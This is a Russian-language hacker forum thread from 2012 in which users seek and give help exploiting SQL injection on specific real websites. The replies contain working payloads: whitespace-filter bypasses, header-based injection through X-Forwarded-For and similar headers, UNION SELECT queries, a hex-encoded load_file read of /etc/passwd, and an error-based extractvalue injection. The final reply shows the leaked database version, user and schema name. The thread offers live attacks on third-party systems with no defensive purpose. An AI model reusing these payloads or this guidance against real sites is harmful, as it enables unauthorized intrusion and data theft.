06.10.2012, 08:26
|
|
Новичок
Регистрация: 01.10.2012
Сообщений: 6
С нами:
7165046
Репутация:
0
|
|
old.islam.kg/?i=1'&lg=kg
Помогите со скулей плз. Еще возможно IP записывает, так что..
Сообщение от None
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '77.245.182.175'' at line 1
p.s. ip конечно изменен |
|
|
06.10.2012, 10:43
|
|
Участник форума
Регистрация: 01.12.2011
Сообщений: 120
С нами:
7604246
Репутация:
55
|
|
Там режутся пробелы, /**/, пробывал еще такие варианты - %09,%0A,%0B,%0C,%0D , при них запрос как бы "вырезается", фильтруются также (). Если найдеш способоб обойти фильтр пробелов, то скорейвсего раскрутишь если она не слепая конечно.
По ip еще, у меня сейчас нет возможности проверить, но попробуй сам отправить в хедерах свой X-FORWARDED-FOR с sql inj, если повезет и ip у них определяется именно так, то может там и условия получше будут.
|
|
|
|
08.10.2012, 12:36
|
|
Новичок
Регистрация: 30.05.2012
Сообщений: 4
С нами:
7343606
Репутация:
0
|
|
Скулю обработал - http://pcmcia.ru/?do=form&id=2+and+1=0+union+select+1,2,3,4,5,6,7,8 ,9,10,11+--+
но запара - фильтрация кавычек - file_priv считать ну никак не получается
|
|
|
|
08.10.2012, 12:46
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
С нами:
11322426
Репутация:
0
|
|
Сообщение от trololoman96
попробуй сам отправить в хедерах свой X-FORWARDED-FOR с sql inj, если повезет и ip у них определяется именно так, то может там и условия получше будут.
Кроме X-Forwarded-For можно попробовать Forwarded, X-Real-IP, Client-IP, HTTP-From, Via
|
|
|
|
08.10.2012, 16:16
|
|
Новичок
Регистрация: 08.04.2010
Сообщений: 1
С нами:
8469890
Репутация:
0
|
|
Сообщение от SpiritDt
Скулю обработал - http://pcmcia.ru/?do=form&id=2+and+1=0+union+select+1,2,3,4,5,6,7,8 ,9,10,11+--+
но запара - фильтрация кавычек - file_priv считать ну никак не получается
Нету доступа к mysql.user.
Что бы смотреть file_priv кавычки не нужны.
|
|
|
|
08.10.2012, 18:03
|
|
Участник форума
Регистрация: 18.01.2012
Сообщений: 162
С нами:
7535126
Репутация:
1
|
|
есть какой-нибудь мануал или статья о том как залиться если file_priv=Y но magic_quotes_gpc = on
зы это читал ,но не понял логику запросов
/showpost.php?p=663815&postcount=39
|
|
|
|
08.10.2012, 20:23
|
|
Новичок
Регистрация: 03.10.2012
Сообщений: 1
С нами:
7162166
Репутация:
0
|
|
Не могу раскрутить , хелп
http://www.l2db.ru/npc/index/2/rg/all/all/8/all/%5C%27
|
|
|
|
09.10.2012, 06:51
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами:
9176038
Репутация:
8
|
|
Сообщение от SpiritDt
Скулю обработал - http://pcmcia.ru/?do=form&id=2+and+1=0+union+select+1,2,3,4,5,6,7,8 ,9,10,11+--+
но запара - фильтрация кавычек - file_priv считать ну никак не получается
Magic Quotes = On
Код:
http://pcmcia.ru/?do=form&id=2+and+1=0+union+select+1,2,3,4,5,6,7,8,9,'10',11+--+
False
File_Priv=N
Код:
http://pcmcia.ru/?do=form&id=2+and+1=0+union+select+1,2,3,4,5,6,7,8,9,load_file(0x2f6574632f706173737764),11+--+
False
Саму БД не смотрел - мож там админка есть...
Сообщение от blesse
есть какой-нибудь мануал или статья о том как залиться если file_priv=Y но magic_quotes_gpc = on
зы это читал ,но не понял логику запросов
/showpost.php?p=663815&postcount=39
Это прокатывает только при двойном запросе и то, при варианте, что данные передаваемые из первого запроса во второй дополнительно не фильтруются.
|
|
|
|
09.10.2012, 08:01
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами:
9176038
Репутация:
8
|
|
Сообщение от Nikel3rN
Не могу раскрутить , хелп
http://www.l2db.ru/npc/index/2/rg/all/all/8/all/%5C%27
Тут вся проблема в том, что магические кавычки включены
Остаётся вариант Error-Based
Твой запрос имеет вид
Код:
SELECT m.*, m.name_ru AS subName, m.name_eng AS name, m.ext_id AS id FROM l2_monsters_rg AS m
JOIN l2_monsters_skills AS strt ON (strt.npc_id=m.ext_id and strt.skill_id=4309)
JOIN l2_drops_rg AS `drop` ON (`drop`.npc_id=m.id and `drop`.item_id in (SELECT id FROM l2_items_rg WHERE name_eng like '%[INJECT]')) WHERE m.lvl BETWEEN 21 and 30 AND m.name_eng!='' and m.type in ("warrior", "treasure", "boss", "zzoldagu", "") ORDER BY m.lvl;
и всё бы хорошо, в теории должен бы был проканать запрос вида
Код:
SELECT m.*, m.name_ru AS subName, m.name_eng AS name, m.ext_id AS id FROM l2_monsters_rg AS m
JOIN l2_monsters_skills AS strt ON (strt.npc_id=m.ext_id and strt.skill_id=4309)
JOIN l2_drops_rg AS `drop` ON (`drop`.npc_id=m.id and `drop`.item_id in (SELECT id FROM l2_items_rg WHERE name_eng like '%\\')) or (select count(*) from l2_drops_rg group by concat(version(),floor(rand(0)*2))+--+%'))
WHERE m.lvl BETWEEN 21 and 30 AND m.name_eng!='' and m.type in ("warrior", "treasure", "boss", "zzoldagu", "") ORDER BY m.lvl;
но в нашем случае хвост запроса не отбрасывается никаким способом. Во всяком случае - я пока не нашёл способа инъекта.
P.S. Поправьте меня, если я ошибаюсь.
P.S S. cat1vo красава ! А у меня сёдня бошка вообще не варит после картошки =(
|
|
|
|
09.10.2012, 14:10
|
|
Новичок
Регистрация: 12.08.2009
Сообщений: 1
С нами:
8814194
Репутация:
0
|
|
Сообщение от Nikel3rN
Не могу раскрутить , хелп
http://www.l2db.ru/npc/index/2/rg/all/all/8/all/%5C%27
Дальше думаю сами сможете?
Код:
http://www.l2db[dot]ru/npc/index/2/rg/all/all/8/all/\'))+and+extractvalue(1,concat(0x3a,version()))+--+-
Version: 5.1.52-log
DB_user: l2db_ru@10.0.66.21
Current_db: l2dbtest
to BigBear, поправил, Вы ошибались!
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
